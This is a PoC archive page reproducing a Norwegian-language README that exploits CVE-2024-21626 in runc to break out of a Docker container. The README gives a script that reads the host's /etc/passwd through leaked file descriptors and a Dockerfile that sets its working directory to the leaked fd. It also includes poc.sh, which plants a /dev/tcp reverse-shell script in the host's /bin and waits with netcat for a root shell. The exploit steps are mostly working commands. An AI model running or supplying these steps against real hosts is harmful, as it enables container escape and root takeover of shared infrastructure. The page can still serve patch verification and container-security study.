Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2024-21626 PoC — runc container breakout through process.cwd trickery and leaked fds

Source
Associated Vulnerability
Title: runc container breakout through process.cwd trickery and leaked fds (CVE-2024-21626)
Description:runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.
Description
POC
Readme
# CVE-2024-21626
POC

# Avhengigheter
## runc 1.1.0 <= 1.1.11

# Installasjon av sårbart miljø
## Sett opp en VM med Ubuntu 20.04 og deretter laster du ned docker ved å følge guiden på deres nettside
```
https://docs.docker.com/engine/install/ubuntu/
```

## Endre patchet 'runc' versjon i Docker til sårbar 'runc' versjon
Last ned sårbar versjon (runc 1.1.11 og tidligere) fra github repo til runc:
https://github.com/opencontainers/runc/releases  
Valgte her runc.amd64 (avhengighet)
![runc_1111](https://github.com/KubernetesBachelor/CVE-2024-21626/assets/110845662/10ca92b4-a598-4e6a-9d55-092ee66528a9)

# Selve exploit
## Kjør verify.sh skriptet
```
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done
```
![verify](https://github.com/KubernetesBachelor/CVE-2024-21626/assets/110845662/d8c0844f-8b57-45e2-a12c-1e3830bfb426)
## Endre working directory i Dockerfile til riktig fd som du fant ved å kjøre verify.sh:

```
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9
```

## Bygg konteineren
```
docker build . -t navn_konteiner
```

## poc.sh
```
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337
```

## Kjør imaget på konteineren og kjør poc.sh i bash shell
```
docker run -it --rm cve2024 bash /poc.sh
```

## Konteineren går i lytte modus
![lytte](https://github.com/KubernetesBachelor/CVE-2024-21626/assets/110845662/d4373d7e-3efb-49ce-ad6a-041befaa6b8c)

## På root på vertsmaskinen kan vi se at det er laget et nytt skript ved filbanen ```/proc/self/cwd/../../../bin/``` kalt 'bash.copy'
![bash](https://github.com/KubernetesBachelor/CVE-2024-21626/assets/110845662/06c20037-d198-421d-b115-f8ca4c11b257)
## Ved å gjøre det nye skriptet kjørbart, samt eksekvering av skriptet
```
chmod +x bash.copy
./bash.copy
```
## Oppnår du et reverse shell i konteineren som er root på vertsmaskinen
![root](https://github.com/KubernetesBachelor/CVE-2024-21626/assets/110845662/136de911-d58f-462d-ab94-1f5ca19d0376)
# Kilde
https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →